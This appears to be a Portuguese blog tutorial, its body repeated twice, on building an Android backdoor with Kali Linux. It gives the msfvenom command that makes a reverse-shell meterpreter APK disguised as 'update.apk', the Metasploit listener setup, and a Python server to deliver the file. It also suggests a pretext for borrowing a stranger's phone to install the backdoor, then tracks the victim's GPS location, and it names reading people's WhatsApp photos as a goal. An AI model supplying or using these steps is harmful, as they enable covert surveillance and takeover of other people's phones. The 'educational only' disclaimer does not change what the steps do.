Olá humanos resolvi voltar brincar kali esses dias, ver algo legal com o android, fiquei pensando que poderia testar algumas coisas no android com kali, tipo pegar geolocalização e saber onde a pessoa tá, saber das fotos de zapzap da vida coisas assim, pser cheguei nesse nivel de brincar.
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.
Neste lab vamos usar:
1 - notebook (com kali linux)
1 - celular android(meu é um galaxy s4) // sim bem velho rsrsrsr
1 - tempo uns (20 minutos) // rsrsrsr
Bah guris e gurias, primeiro passo é estar conectado na mesma rede pois vamos usar um ataque chamado MITM, para saber mais clique em cima de MITM. Em resulmo esse ataque pode ser feito usando uma rede local, porem não é muito dificil fazer usando a rede WAN.
Antes de qualquer coisas por ordem, criei uma rede de pasta dessa forma.
root@leaozinho:~/.pentest# ls virus/
android windows
root@leaozinho:~/.pentest# ls virus/android/
update.apk
root@leaozinho:~/.pentest#
Bom agora precisamos rodar o comando
root@leaozinho:~/.pentest/virus/android# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.15 lport=6666 R > update.apk
Bom agora devemos ter um arquivo chamado update.apk, temos nosso backdoor tZ guri auahuahauhauahuh, agora vanos deixar em uma aba no terminal do msfconsole vamos rodar
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.40-dev ]
+ -- --=[ 1596 exploits - 912 auxiliary - 274 post ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.15:6666
[*] Starting the payload handler...
+ Nesse momento vamos abrir outra aba de terminal para criar um server python para pegar esse arquivo nessa pasta /.pentest/virus/android/update.apk , nada muito complexo basta abrir um comando na pasta e rodar o seguinte comando.
root@leaozinho:~/.pentest/virus/android# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Com isso abra seu navegador na tela do seu celular conectado na rede e acesso o link, no meu caso o ip é o 192.168.0.15, como o server http python roda na porta 8000, basta digitar no navegador.
EX: http://192.168.0.15:800
basta abrir esse link e fazer o download do arquivo apk para dentro de algum celular na rede. Segue o exemplo da engenharia social da rede rsrsrr
"Tio me empresta seu celular perdi o meu é estou sem a chave de casa, me empresta o seu ?" - dica quando estiver com o celular em mãos, ative gps so por zuoas mesmo auhauhauhauh
Bum !!!! vc baixa e xazam !!!! veja !!!
quando voltar pra tela do msfconsole veja que ela vai estar mais ou menos assim
Vai abrir uma tela de session no meterpreter auhauahuah xazammm !!!! vc ta dentro !!!
Para ter acesso as coordenadas do GPS, basta digitar geolocate
meterpreter > geolocate
[*] Current Location:
Latitude: 0.00000000
Longitude: 0.0000000
To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=0.0000000,0.00000000&sensor=true
Bom para ter mais informações basta digitar help é ler a documentação dele, espero que tenha gostado >/////< bjks e até a proxima...
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.
Neste lab vamos usar:
1 - notebook (com kali linux)
1 - celular android(meu é um galaxy s4) // sim bem velho rsrsrsr
1 - tempo uns (20 minutos) // rsrsrsr
Bah guris e gurias, primeiro passo é estar conectado na mesma rede pois vamos usar um ataque chamado MITM, para saber mais clique em cima de MITM. Em resulmo esse ataque pode ser feito usando uma rede local, porem não é muito dificil fazer usando a rede WAN.
Antes de qualquer coisas por ordem, criei uma rede de pasta dessa forma.
root@leaozinho:~/.pentest# ls virus/
android windows
root@leaozinho:~/.pentest# ls virus/android/
update.apk
root@leaozinho:~/.pentest#
Bom agora precisamos rodar o comando
root@leaozinho:~/.pentest/virus/android# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.15 lport=6666 R > update.apk
Bom agora devemos ter um arquivo chamado update.apk, temos nosso backdoor tZ guri auahuahauhauahuh, agora vanos deixar em uma aba no terminal do msfconsole vamos rodar
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.40-dev ]
+ -- --=[ 1596 exploits - 912 auxiliary - 274 post ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.15:6666
[*] Starting the payload handler...
+ Nesse momento vamos abrir outra aba de terminal para criar um server python para pegar esse arquivo nessa pasta /.pentest/virus/android/update.apk , nada muito complexo basta abrir um comando na pasta e rodar o seguinte comando.
root@leaozinho:~/.pentest/virus/android# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Com isso abra seu navegador na tela do seu celular conectado na rede e acesso o link, no meu caso o ip é o 192.168.0.15, como o server http python roda na porta 8000, basta digitar no navegador.
EX: http://192.168.0.15:800
basta abrir esse link e fazer o download do arquivo apk para dentro de algum celular na rede. Segue o exemplo da engenharia social da rede rsrsrr
"Tio me empresta seu celular perdi o meu é estou sem a chave de casa, me empresta o seu ?" - dica quando estiver com o celular em mãos, ative gps so por zuoas mesmo auhauhauhauh
Bum !!!! vc baixa e xazam !!!! veja !!!
quando voltar pra tela do msfconsole veja que ela vai estar mais ou menos assim
Vai abrir uma tela de session no meterpreter auhauahuah xazammm !!!! vc ta dentro !!!
Para ter acesso as coordenadas do GPS, basta digitar geolocate
meterpreter > geolocate
[*] Current Location:
Latitude: 0.00000000
Longitude: 0.0000000
To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=0.0000000,0.00000000&sensor=true
Bom para ter mais informações basta digitar help é ler a documentação dele, espero que tenha gostado >/////< bjks e até a proxima...
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.
Comentários
Postar um comentário